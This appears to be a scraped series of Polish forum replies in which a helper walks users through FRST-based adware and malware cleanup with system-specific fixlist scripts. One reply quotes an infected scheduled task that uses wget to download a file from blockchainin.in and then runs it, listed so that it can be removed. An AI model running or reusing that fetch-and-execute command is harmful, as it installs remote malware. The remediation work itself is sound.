picasso

Tylko że nie ma wynikowych danych:

Wyłącz całkowicie komputer, następnie go włącz, wejdź w Tryb normalny i zrób mi nowy log FRST z opcji Scan (bez Addition i Shortcut).

Nie został odblokowany trzeci klucz, co się działo podczas opcji Fix? Ładuj kolejny fixlist.txt o treści: Unlock: HKLM\SOFTWARE\Classes\CLSID\{D2BF470E-ED1C-487F-A666-2BD8835EB6CE} Przedstaw wynikowy fixlog.txt.

Te klucze są totalnie zablokowane. Spróbuj (ciągle siedząc w Trybie awaryjnym) zapuścić taki oto skrypt fixlist.txt do FRST: Unlock: HKLM\SOFTWARE\Classes\CLSID\{af83e43c-dd2b-4787-826b-31b17dee52ed} Unlock: HKLM\SOFTWARE\Classes\CLSID\{d2bf470e-ed1c-487f-a333-2bd8835eb6ce} Unlock: HKLM\SOFTWARE\Classes\CLSID\{D2BF470E-ED1C-487F-A666-2BD8835EB6CE} Przedstaw wynikowy fixlog.txt.

Dane są dziwne - brak dostępu do podanych kluczy oraz nieznalezienie pliku toolbar.reg na Pulpicie. Plik był - czy go skasowałaś stamtąd? Przejdź w Tryb awaryjny Windows i ponów ostatni Fix ale zmodyfikowany do poniższej treści: ListPermissions: HKLM\SOFTWARE\Classes\CLSID\{af83e43c-dd2b-4787-826b-31b17dee52ed} ListPermissions: HKLM\SOFTWARE\Classes\CLSID\{d2bf470e-ed1c-487f-a333-2bd8835eb6ce} ListPermissions: HKLM\SOFTWARE\Classes\CLSID\{D2BF470E-ED1C-487F-A666-2BD8835EB6CE} ListPermissions: HKLM\SOFTWARE\Microsoft\Internet Explorer\Toolbar Reg: reg query HKLM\SOFTWARE\Classes\CLSID\{af83e43c-dd2b-4787-826b-31b17dee52ed} /s Reg: reg query HKLM\SOFTWARE\Classes\CLSID\{d2bf470e-ed1c-487f-a333-2bd8835eb6ce} /s Reg: reg query HKLM\SOFTWARE\Classes\CLSID\{D2BF470E-ED1C-487F-A666-2BD8835EB6CE} /s Przedstaw wynikowy fixlog.txt.

Kończymy temat: 1. Odinstaluj starą niebezpieczną Java™ 6 Update 37. 2. Usuń ręcznie pobrane skanery z folderu D:\WALKA_Z_TROJANEM. 3. Zastosuj DelFix oraz wyczyść foldery Przywracania systemu: KLIK.

Co do Fix - czyżby COMODO tu zbroił coś? Wpisy Toolbar nadal uszkodzone. Poproszę o kolejne dane. Wklej do Notatnika: Reg: reg query HKLM\SOFTWARE\Classes\CLSID\{af83e43c-dd2b-4787-826b-31b17dee52ed} /s Reg: reg query HKLM\SOFTWARE\Classes\CLSID\{d2bf470e-ed1c-487f-a333-2bd8835eb6ce} /s Reg: reg query HKLM\SOFTWARE\Classes\CLSID\{D2BF470E-ED1C-487F-A666-2BD8835EB6CE} /s CMD: type "C:\Documents and Settings\Administrator\Pulpit\toolbar.reg" Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Pokaż wynikowy fixlog.txt.

Jest tu mnóstwo obiektów adware w systemie (a niektóre to wyglądają na strasznie stare siedzące nie wiadomo jak długo). Na dodatek adware przekonwertowało typ przeglądarki Google Chrome z wersji stabilnej do developerskiej dla twórców rozszerzeń (brak limitacji instalacji rozszerzeń do Chrome Web Store) i jest i tak wymagana kompleksowa reinstalacja. Usuwanie zostanie podzielone na kilka etapów. Wstęp: 1. Przez Panel sterowania odinstaluj: - Adware: 337 GAMES, AppPitooU, Fast And Safe, Hyperionics DB Toolbar, IB Updater Service, PowerOffer 2.0, Search Protect, SGC 2.0.1.248, SGC 2.0.1.250, siaver Box, SupTab, Video Player, VidPlaya versione 1.0.1 i nieszczęsne Google Chrome. Przy deinstalacji Chrome zaznacz opcję Usuń także dane przeglądarki. - Stare wersje i zbędniki: Akamai NetSession Interface, Adobe Reader X (10.1.12) - Italiano, Java™ 6 Update 32, Java™ 7 Update 5, JavaFX 2.1.1 Nie instaluj na razie nowej wersji Google Chrome! 2. Zrób nowe logi FRST z opcji Scan, zaznacz ponownie pola Addition i Shortcut, by powstały trzy logi. .

Coś tu poszło bardzo nie tak. 1. Po pierwsze, żadnych oznak deinstalacji rozszerzeń adware, oba wymieniane są nadal w Firefox. Co Ty właściwie robiłaś w Firefox? FF Extension: Site Matcher - C:\Documents and Settings\Administrator\Dane aplikacji\Mozilla\Firefox\Profiles\tmaw22zk.default-1396274136437\Extensions\sitematcher_src@sitematcher_src.com [2014-07-18] FF Extension: No Name - C:\Documents and Settings\Administrator\Dane aplikacji\Mozilla\Firefox\Profiles\tmaw22zk.default-1396274136437\Extensions\jid0-aSChrRyNMdJxBmorrZFa2r4Vv4w@jetpack.xpi [2014-11-17] 2. Po drugie, dodatkowy Fix się nawet nie wykonał - doszedł do drugiej linii i stop. Ponadto, pojawiły się jakieś dodatkowe szkody (ubytki QT Breadcrumbs Address Bar, QT TabBar i QT Tab Standard Buttons) nie wiadomo z jakiej przyczyny: Toolbar: HKLM - QT Breadcrumbs Address Bar - {af83e43c-dd2b-4787-826b-31b17dee52ed} - C:\WINDOWS\system32\mscoree.dll (Microsoft Corporation) Toolbar: HKLM - QT TabBar - {d2bf470e-ed1c-487f-a333-2bd8835eb6ce} - C:\WINDOWS\system32\mscoree.dll (Microsoft Corporation) Toolbar: HKLM - QT Tab Standard Buttons - {D2BF470E-ED1C-487F-A666-2BD8835EB6CE} - C:\WINDOWS\system32\mscoree.dll (Microsoft Corporation) vs. Toolbar: HKLM - No Name - {af83e43c-dd2b-4787-826b-31b17dee52ed} - No File Toolbar: HKLM - No Name - {d2bf470e-ed1c-487f-a333-2bd8835eb6ce} - No File Toolbar: HKLM - No Name - {D2BF470E-ED1C-487F-A666-2BD8835EB6CE} - No File Czy na pewno COMODO był wyłączony? Co widziałaś podczas opcji przetwarzania Fix? I trzeba odzyskać poprzednią wersję wpisów. Otwórz Notatnik i wklej w nim: Reg: reg load HKLM\TMP C:\FRST\Hives\SOFTWARE Reg: reg export "HKLM\TMP\Microsoft\Internet Explorer\Toolbar" "C:\Documents and Settings\Administrator\Pulpit\toolbar.reg" Reg: reg unload HKLM\TMP Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Na Pulpicie powstanie plik toolbar.reg. Otwórz do edycji w Notatniku i zamień HKEY_LOCAL_MACHINE\TMP na HKEY_LOCAL_MACHINE\SOFTWARE. Uruchom plik i potwierdź import do rejestru. Zrób nowy log FRST z opcji Scan. .

Czy na pewno były czytane tutejsze zasady działu? Kiedy został pobrany FRST? Posługujesz się wersją z 1 grudnia, najnowszy FRST jest z wczoraj. Ponadto, brak całego zestawu logów i nie ma obowiązowego GMER. Wspominana infekcja jest w systemie, ładuje się przez Harmonogram zadań: Task: {A355DEFE-A9E5-4BE9-A7D9-887D010D5987} - System32\Tasks\SYSTEM => cmd.exe /R cd "C:\ProgramData" & ping 1.1.1.1 -n 300 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp http://blockchainin.in/dat.bmp?data=NXCzqopbrzlpHNPSWurp;tc;1416071063 & start cmd /R dat.bmp ==================== One Month Modified Files and Folders ======= 2014-12-04 10:58 - 2014-10-26 11:19 - 00000000 _____ () C:\ProgramData\dat.bmp 2014-11-15 18:03 - 2014-10-26 11:07 - 00332800 _____ () C:\ProgramData\wget.exe Wdróż następujące działania: 1. Zaktualizuj FRST do najnowszej wersji: KLIK. Otwórz Notatnik i wklej w nim: CloseProcesses: Task: {A355DEFE-A9E5-4BE9-A7D9-887D010D5987} - System32\Tasks\SYSTEM => cmd.exe /R cd "C:\ProgramData" & ping 1.1.1.1 -n 300 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp http://blockchainin.in/dat.bmp?data=NXCzqopbrzlpHNPSWurp;tc;1416071063 & start cmd /R dat.bmp S4 nvvad_WaveExtensible; system32\drivers\nvvad32v.sys [X] S3 TuneUpUtilitiesDrv; \??\C:\Program Files\TuneUp Utilities 2014\TuneUpUtilitiesDriver32.sys [X] S2 TuneUp.UtilitiesSvc; "C:\Program Files\TuneUp Utilities 2014\TuneUpUtilitiesService32.exe" [X] HKLM\...\Run: [] => [X] HKU\S-1-5-21-3833150328-1824991979-3301933300-1000\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.gazeta.pl/0,0.html?p=170 C:\ProgramData\dat.bmp C:\ProgramData\wget.exe C:\ProgramData\McAfee C:\ProgramData\TuneUp Software C:\Users\AiR\AppData\Roaming\TuneUp Software C:\Windows\system32\authuitu.dll C:\Windows\system32\TURegOpt.exe C:\Windows\system32\uxtuneup.dll CMD: dir /a C:\ProgramData EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Oprogramowanie TuneUp nie zostało całkowicie odinstalowane. Uruchom narzędzie Microsoftu: KLIK. Zaakceptuj > Wykryj problemy i pozwól mi wybrać poprawki do zastosowania > Odinstalowywanie > zaznacz na liście po kolei dwa ukryte wpisy TuneUp Utilities 2014 > Dalej. 3. Zrób nowy log FRST z opcji Scan, zaznacz ponownie pole Addition, by powstały dwa logi. Dołącz też plik fixlog.txt. Ponadto, w Firefox jest niejasny dodatek o nieznajdowanym na Google identyfikatorze, czy kojarzysz instalację (podaj link skąd): FF Extension: Firefox Google Search - C:\Users\AiR\AppData\Roaming\Mozilla\Firefox\Profiles\jb286bnm.default\Extensions\jid1-ruV7VAC61k9bqA@jetpack.xpi [2014-11-12]

Wszystko jasne, tak jak już mówiłam, są dwa obiekty adware w Firefox, tylko jeden wyłączony, drugi wręcz przeciwnie. 1. W Rozszerzeniach Firefox odinstaluj hdplugin final (to fałszywa wtyczka, produkuje przekierowania) oraz Site Matcher. 2. Otwórz Notatnik i wklej w nim: CloseProcesses: Toolbar: HKU\S-1-5-21-1491950412-2009852829-4049741679-500 -> No Name - {EEF280F3-B6ED-46D8-A8FD-57BD0C4A9ECF} - No File FF HKLM\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - C:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension C:\Documents and Settings\Administrator\Dane aplikacji\Mozilla\Firefox\Profiles\tmaw22zk.default-1396274136437\Extensions\staged(2) C:\Documents and Settings\Administrator\Dane aplikacji\OpenCandy C:\Documents and Settings\Administrator\Dane aplikacji\SimilarAddon C:\Documents and Settings\Administrator\Dane aplikacji\Solvusoft C:\Documents and Settings\Administrator\Ustawienia lokalne\Dane aplikacji\FileViewPro C:\WINDOWS\system32\roboot.exe C:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Na czas operacji wyłącz COMODO, bo przeszkodzi FRST. Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Zrób nowy log FRST z opcji Scan (bez Addition i Shortcut). Dołącz też plik fixlog.txt. .

Jest tu bardzo silnie zmodyfikowany nieoryginalny system XP (instalowany z jakiejś przerobionej płyty), w którym nie działa WMI. Ta funkcjonalność jest wykorzystywana przez FRST do poboru nazw spakowanych rozszerzeń Firefox (XPI), co tu się nie udało ze względu na oczywiste braki w systemie. Na pewno jest adware w Firefox (na oko widzę conajmniej 1 lub 2 obiekty), tylko proszę dla porównania (by szybko połączyć identyfikatory z nazwą wyświetlaną) o zrzut ekranu z rozszerzeń Firefox. Rozwiń okno tak, by było widać wszystkie pozycje. PS. A to omijam sugerując się poprzednim wątkiem (KLIK): HKU\S-1-5-21-1491950412-2009852829-4049741679-500\...\Run: [svhost] => C:\WINDOWS\System32\svhost.exe [444416 2007-04-09] ()

Chodzi tu o to, że FRST skanuje jeden wybrany system i to z tego systemu pokazuje "mieszany" skład np. sterowniki BitDefender są wykryte jako "zainstalowane" równocześnie na C i D, co jest nienormalne. Albo to jakieś przekłamania w raporcie FRST, albo jest tu coś nie w porządku. Podtrzymuję: wdrażaj LastRegBack jak podałam wyżej.

Mam pytanie dodatkowe, w logu widzę bardzo dziwne rzeczy, tzn. rozdwojenie struktur: część wpisów kieruje na katalog D:\Windows, a część na C:\Windows, podobnie jest z katalogiem C:\Program Files i D:\Program Files. Czy przypadkiem nie było ręcznych nieudolnych migracji / zmiany liternictwa? W związku z tym, iż układ jest dla mnie niejasny, spróbuj ogólnie cofnąć rejestr, wg raportu FRST jest dostatecznie daleka kopia rejestru typu RegBack. 1. W Notatniku przygotuj plik o treści: LastRegBack: 2014-09-28 09:28 Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt na pendrive gdzie siedzi FRST. Uruchom FRST i kliknij w Fix. Na pendrive powstanie plik fixlog.txt. 2. Sprawdź czy jesteś w stanie wejść do Windows. Jeśli tak, to zrób spod Windows pełne logi FRST z opcji Scan (pola Addition i Shortcut zaznaczone). Dołącz też plik fixlog.txt.

Brakujący wpis grzecznie wrócił na miejsce: BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.) Wszystko zrobione, toteż przejdź do wiadomych kroków finalizujących całość: KLIK.

Dostarczyłeś plik Addition z konta Prv a nie User. Czy problemy nadal występują? Wszystko zrobione. Jeszcze drobne poprawki. Otwórz Notatnik i wklej w nim: C:\Users\Prv\AppData\Roaming\Mozilla\Extensions\{ec8030f7-c20a-464f-9b0e-13a3a9e97384} C:\Windows\system32\GroupPolicy\Machine C:\Windows\system32\GroupPolicy\User C:\Windows\SysWOW64\GroupPolicy\gpt.ini RemoveDirectory: C:\AdwCleaner RemoveDirectory: C:\FRST\Quarantine RemoveDirectory: C:\Users\Prv\Desktop\Stare dane programu Firefox Reg: reg delete HKLM\SYSTEM\CurrentControlSet\Services\NPF /f Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Przedstaw wynikowy fixlog.txt.

Fix wykonany, ale jest tu pewien problem. W trakcie napraw (po pierwszym podejściu) nagle zniknął jeden z kluczy BHO i nie wiem dlaczego. Pierwszy Fix nie ruszał tam nic (drugi już tylko sprawdzał czy klucz jest), była za to deinstalacja Java usuwająca swoje obiekty z relatywnego obszaru i może to działanie miało jakiś błąd. Odzyskaj kopię klucza: 1. Otwórz Notatnik i wklej w nim: Reg: reg load HKLM\TMP C:\FRST\Hives\SOFTWARE Reg: reg export "HKLM\TMP\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects" C:\Users\Irmina\Desktop\bho.reg Reg: reg unload HKLM\TMP Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. 2. Na Pulpicie powstanie plik bho.reg. Otwórz do edycji w Notatniku i zamień HKEY_LOCAL_MACHINE\TMP na HKEY_LOCAL_MACHINE\SOFTWARE. Z prawokliku na plik opcja Scal. 3. Zrób nowy log FRST z opcji Scan (bez Addition i Shortcut). .

Operacje pomyślnie przeprowadzone i nic więcej szkodliwego nie widać w raportach. Finalizując czyszczenie: 1. Skasuj z dysku ręcznie: C:\Users\PC2\adwcleaner_3.310.exe C:\Users\PC2\Desktop\Old Firefox Data 2. Zastosuj DelFix oraz wyczyść foldery Przywracania systemu: KLIK. U mnie jest identyczny komunikat na stronie eskaGO przy czynnym Adblock Plus w Firefox. U Ciebie (wszystkie przeglądarki dotknięte) definitywnie to musi być generowane przez Kasperskiego, który ma wbudowany moduł blokujący reklamy Anti-banner. Tak więc do wglądu opcje Kasperskiego. Nawiasem mówiąc to widać także w logu i specyficzne rozszerzenie Kasperskiego w Firefox. FF HKLM\...\Firefox\Extensions: [anti_banner@kaspersky.com] - C:\Program Files\Kaspersky Lab\Kaspersky Internet Security 2013\FFExt\anti_banner@kaspersky.com FF Extension: Anti-Banner - C:\Program Files\Kaspersky Lab\Kaspersky Internet Security 2013\FFExt\anti_banner@kaspersky.com [2014-03-05]

Nowa bardzo niekorzystna zmiana w systemie. Windows został zainfekowany, zainstalowałeś adware grupy Spigot, co zapewne ma negatywny wpływ na system - w starcie ładowane niepożądane obiekty, w przeglądarkach obiekty reklamodawcze. Adware powstało w tym samym przedziale czasowym co obiekty Auslogics, co nasuwa wnioski, że instalator programu miał świństwa, a Ty przez nieuwagę to przepuściłeś: 2014-11-24 07:33 - 2014-11-24 07:33 - 00000000 ____D () C:\ProgramData\Auslogics 2014-11-24 07:32 - 2014-11-24 09:25 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Auslogics 2014-11-24 07:32 - 2014-11-24 09:25 - 00000000 ____D () C:\Program Files (x86)\Auslogics 2014-11-24 07:32 - 2014-11-24 07:33 - 00000000 ____D () C:\Users\ADMIN\AppData\Roaming\BrowserExtensions 2014-11-24 07:32 - 2014-11-24 07:32 - 00000000 ____D () C:\Users\ADMIN\AppData\Roaming\Search Protection Czyszczenie: 1. Przez Panel sterowania odinstaluj adware: Browser Extensions, Search Protection. 2. Wyczyść Firefox z przekierowań Spigot: menu Pomoc > Informacje dla pomocy technicznej > Zresetuj program Firefox. Zakładki i hasła nie zostaną naruszone. 3. Zaktualizuj FRST, bo wersja, której używasz już jest nieświeża i zrób nowe logi z opcji Scan (główny + Addition). .

Poproszę o log FRST zrobiony z poziomu środowiska zewnętrznego WinRE: KLIK.

Błąd "Eksplorator Windows przestał działać..." w Dzienniku zdarzeń jest bardzo enigmatyczny i jako moduł przyczynowy sugeruje plik Microsoftu: Application errors: ================== Error: (12/03/2014 06:42:03 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Nazwa aplikacji powodującej błąd: explorer.exe, wersja: 6.1.7601.17567, sygnatura czasowa: 0x4d672ee4 Nazwa modułu powodującego błąd: USER32.dll, wersja: 6.1.7601.17514, sygnatura czasowa: 0x4ce7c9f1 Kod wyjątku: 0xc000041d Przesunięcie błędu: 0x0000000000005357 Identyfikator procesu powodującego błąd: 0x1af0 Godzina uruchomienia aplikacji powodującej błąd: 0xexplorer.exe0 Ścieżka aplikacji powodującej błąd: explorer.exe1 Ścieżka modułu powodującego błąd: explorer.exe2 Identyfikator raportu: explorer.exe3 Ale w raporcie zwracają uwagę hooki ShellIconOverlayIdentifiers (ikony nakładkowe w eksploratorze) wprowadzone przez funkcję BitDefender SafeBox. Ten rodzaj rozszerzeń powłoki eksploratora może być przyczyną problemów. Tu dla porównania podobny problem z winy ASUS WebStorage: KLIK. ShellIconOverlayIdentifiers: [__SafeBox1] -> {152C96EB-288E-4EDC-B7C6-D21F8250ADF3} => C:\Program Files\Bitdefender\Bitdefender SafeBox\SafeBoxShell.dll (Bitdefender) ShellIconOverlayIdentifiers: [__SafeBox2] -> {342DAA0B-D796-460D-8566-901E08A1CCAD} => C:\Program Files\Bitdefender\Bitdefender SafeBox\SafeBoxShell.dll (Bitdefender) ShellIconOverlayIdentifiers: [__SafeBox3] -> {57595DAE-1AE1-4D97-A49E-67CBB53B52DF} => C:\Program Files\Bitdefender\Bitdefender SafeBox\SafeBoxShell.dll (Bitdefender) ShellIconOverlayIdentifiers: [__SafeBox4] -> {33816773-98AE-4723-ADE0-EBE54C8B5A67} => C:\Program Files\Bitdefender\Bitdefender SafeBox\SafeBoxShell.dll (Bitdefender) Proponuję więc testowo wyłączyć to rozszerzenie powłoki, by sprawdzić czy objawy ustąpią. Uruchom ShellExView x64, wyszukaj wpisy związane z modułem SafeBoxShell.dll, wszystkie wystąpienia wyłącz i zresetuj system. Czy na pewno nie robiłeś czegoś więcej? W raporcie widać, że dwie usługi BitDefeder (włącznie z tą która wiąże się z powyższym) są obecnie w stanie "Wyłączono": S4 BdDesktopParental; C:\Program Files\Bitdefender\Bitdefender 2015\bdparentalservice.exe [78144 2014-11-12] (Bitdefender) S4 SafeBox; C:\Program Files\Bitdefender\Bitdefender SafeBox\safeboxservice.exe [94624 2013-07-08] (Bitdefender) Nagła utrata polonizacji specjalnych folderów to głównie problem plików desktop.ini w tych folderach. Tu dla porównania analogiczny problem tylko w Menu Start: KLIK. Możliwości: pliki zostały skasowane, mają nieodpowiednią zawartość, lub też utraciły atrybuty "ukryty systemowy" (HS) - czyli są widzialne nie tylko po odznaczeniu opcji "Ukryj chronione pliki systemowe" w Opcjach folderów. Tu przedstawiam zawartość moich plików desktop.ini, które powinny wyglądać u Ciebie identycznie: C:\Users\Administrator\Downloads\desktop.ini [.ShellClassInfo] LocalizedResourceName=@%SystemRoot%\system32\shell32.dll,-21798 IconResource=%SystemRoot%\system32\imageres.dll,-184 C:\Users\Administrator\Desktop\desktop.ini [.ShellClassInfo] LocalizedResourceName=@%SystemRoot%\system32\shell32.dll,-21769 IconResource=%SystemRoot%\system32\imageres.dll,-183 C:\Users\Public\Desktop\desktop.ini [.ShellClassInfo] LocalizedResourceName=@%SystemRoot%\system32\shell32.dll,-21799 PS. I usuń sobie puste wpisy oraz przeczyść Tempy. W spoilerze instrukcja:

Używałeś SpyHunter - to program wątpliwej reputacji, z daleka od niego. Reklamuje się jako remover infekcji A lub B, po czym się okazuje, że po instalacji są zgłoszenia o opłatach. Nie sprawdzam tylko IP DNS, ale i IP pod jakim użytkownik jest widziany na forum (funkcja administracyjna). Jeśli oba IP są z tej samej grupy, to nawet bardzo egzotyczny adres nie jest traktowany przeze mnie jako infekcja. Infekcja jest wtedy, gdy występuje rozbieżność. tzn. np. użytkownik widziany pod polskim IP pokazuje mi ukraińskie serwery DNS pobrane z routera, lub są widziane dwie różne sieci z innych krajów. Ale infekcji brak gdy oba IP wykazują ten sam kierunek. Obecnie w raportach FRST i tak są pokazane inne adresy DhcpNameServer. We wszystkich raportach FRST (włącznie z raportami podanymi na peb.pl) widać gdzie leży problem. W Firefox w lokalizacji globalnej siedzi rozszerzenie adware Vonteera: FF Extension: Happy Safe ads - C:\Program Files\Mozilla Firefox\distribution\bundles\addon@Vonteera.com [2014-11-11] W spoilerze komentarze co robili na tamtym forum. Przeprowadź następujące operacje: 1. Otwórz Notatnik i wklej w nim: CloseProcesses: S3 MBAMSwissArmy; \??\C:\Windows\system32\drivers\MBAMSwissArmy.sys [X] C:\Program Files\Mozilla Firefox\distribution C:\Users\PC2\Downloads\SpyHunter-Installer.exe Reg: reg delete "HKU\S-1-5-18\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes" /f EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Dodatkowo wykonaj też ogólne czyszczenie Firefox: menu Pomoc > Informacje dla pomocy technicznej > Zresetuj program Firefox. Zakładki i hasła nie zostaną naruszone. 3. Było grzebanie w Google Chrome za pomocą skryptu OTL, toteż: Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Zresetuj ustawienia przeglądarki. Zakładki i hasła nie zostaną naruszone. 4. Zrób nowy log FRST z opcji Scan (bez Addition i Shortcut). Dołącz też plik fixlog.txt. Wypowiedz się czy problem ustąpił. .

Oznak infekcji brak, więc temat przenoszę do działu Windows. Uwaga dodatkowa na przyszłość związana z poniższymi plikami: C:\Users\Jacek\Downloads\RootkitRevealer(11876)-dp.exe C:\Users\Jacek\Downloads\Startup-Delayer(33672)-dp.exe Rootkit Revealer to tak archaiczny soft (z 2006), że jego używanie mija się kompletnie z celem w dzisiejszych czasach, a pobrane pliki to nie są nawet poprawne instalatory tylko śmieci "Asystent pobierania" dobrychprogramów - korzystaj tam tylko z Linków bezpośrednich: KLIK. Ja tu jednak podejrzewam oprogramowanie zabezpieczające, a konkretnie COMODO (choć Avira mimo wszystko także wchodzi w skład podejrzanych). Bardzo inwazyjny soft ładowany przy udziale grupy sterowników, a tych elementów startowych nie sprawdzałeś, bo Windows nie umożliwia wyłączania sterowników via Menedżer procesów Windows 8 (którym się posługiwałeś, o czym zawiadamia Addition) czy msconfig, a poza tym sam COMODO nie pozwoli się skrzywdzić (ochrona komponentów). Tu na forum COMODO i jemu podobne występowały w podobnych kontekstach wolnego startu i nie tylko takie sztuki (np. całkowicie zablokowany system w trybie normalnym), a tu z kolei masz przykładowy temat losowego nie ładowania miniaturek w eksploratorze z przyczyny aktywności COMODO: KLIK. Tak więc przed podejmowaniem jakichkolwiek innych działań sugeruję testową deinstalację COMODO, by ocenić czy wystąpią wyraźne zmiany. Tylko deinstalacja odcina wszystkie aktywności (sterowniki), proste wyłączanie w opcjach nie. PS. A jeśli chodzi ogólnie o wyłączanie ze startu, to pomijając to co już jest wyłączone via Menedżer zadań: (+ doedytowany wątek z NvStreamSvc) ... mógłbyś posunąć się dalej i w Autoruns: - Karta Services: odznacz BingDesktopUpdate, NvNetworkService, KMService (crack Office lub czegoś podobnego). - Karta Drivers: skasuj odpadkowe wpisy cpuz137, GPUZ, MEMSWEEP2. - Karta Scheduled Tasks: odznacz Game_Booster_AutoUpdate, IUM-F1E24CA0-B63E-4F13-A9E3-4ADE3BFF3473-Logon (Intel Update Manager). Alternatywne postępowanie z aktualizatorem Intel: KLIK. The driver \Driver\WUDFRd failed to load for the device ROOT\LENOVOVHID\0000. The driver \Driver\WudfRd failed to load for the device ROOT\WPD\0000. Rekordy "Microsoft-Windows-Kernel-PnP" to są ostrzeżenia a nie błędy. O ile związek ze startem Windows mógłby występować, to wątpię, by to się zazębiało z punktem 3 opisanych problemów. 1. Rekord wyliczający urządzenie ROOT\LENOVOVHID\0000 (Lenovo "Energy Management"): KLIK / KLIK. W obu tematach użytkownicy raportują odczyty z Dziennika zdarzeń, lecz nie wspominają o żadnych problemach jakie Ty wyliczasz. 2. Rekord wyliczający urządzenie ROOT\WPD\0000 jest związany z poniższym odczytem FRST, czyli instalacją Visual Studio (KLIK). Bardzo wątpię, by był to problem odbijający się na dysfunkcji całego systemu. Tu z kolei rosyjski temat, w którym (o ile dobrze sobie przetłumaczyłam) użytkownik pyta się co to za problem, by się dowiedzieć o co chodzi, ale system działa poprawnie: KLIK. A tu kolejny temat opowiadający jak to sobie użytkownik wyłączył urządzenie w menedżerze i zapomniał o sprawie: KLIK. R3 SensorsSimulatorDriver; C:\Windows\system32\DRIVERS\WUDFRd.sys [227840 2014-05-31] (Microsoft Corporation) ==================== Faulty Device Manager Devices ============= Name: Microsoft Visual Studio Location Simulator Sensor Description: Microsoft Visual Studio Location Simulator Sensor Class Guid: {5175d334-c371-4806-b3ba-71fd53c9258d} Manufacturer: Microsoft Corporation Service: SensorsSimulatorDriver Problem: : Windows has stopped this device because it has reported problems. (Code 43) Resolution: One of the drivers controlling the device notified the operating system that the device failed in some manner. For more information about how to diagnose the problem, see the hardware documentation. Posiadasz tylko jeden dysk fizyczny? Przy założeniu, że dysk z Windows jest pierwszy w kolejności lub jest tylko jeden oraz nie ma tu partycji typu GPT, zrób dump MBR wg poniższych wytycznych, a podrzucę autorowi FRST do weryfikacji w czym problem. Otwórz Notatnik i wklej w nim: SaveMbr: drive=0 Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Doczep tu wynikowy plik MBRDUMP.txt. .

Co z tą operacją:

Akcje pomyślnie wykonane, a sterownik Hotspot zniknął. Na drugim koncie jest zanieczyszczony Firefox i kilka pustych wpisów w starcie. Operacje na Marku: 1. Otwórz Notatnik i wklej w nim: HKU\S-1-5-21-431021187-217253523-1019275998-1000\...\Run: [HDSoft] => "C:\Program Files (x86)\iFree Skype Recorder\irecorder.exe" HKU\S-1-5-21-431021187-217253523-1019275998-1000\...\Run: [ALLUpdate] => "C:\Program Files (x86)\ALLPlayer\ALLUpdate.exe" "sleep" SearchScopes: HKU\S-1-5-21-431021187-217253523-1019275998-1000 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = Reg: reg add "HKLM\SOFTWARE\Microsoft\Internet Explorer\Main" /v Default_Page_URL /t REG_SZ /d "http://go.microsoft.com/fwlink/?LinkId=69157" /f Reg: reg add "HKLM\SOFTWARE\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_SZ /d "http://go.microsoft.com/fwlink/?LinkId=69157" /f Reg: reg add "HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Main" /v Default_Page_URL /t REG_SZ /d "http://go.microsoft.com/fwlink/?LinkId=69157" /f Reg: reg add "HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Main" /v "Search Page" /t REG_SZ /d "http://go.microsoft.com/fwlink/?LinkId=54896" /f Reg: reg delete "HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Main" /v "Search Bar" /f Reg: reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\mountpoints2 /f DeleteQuarantine: Plik zapisz pod nazwą 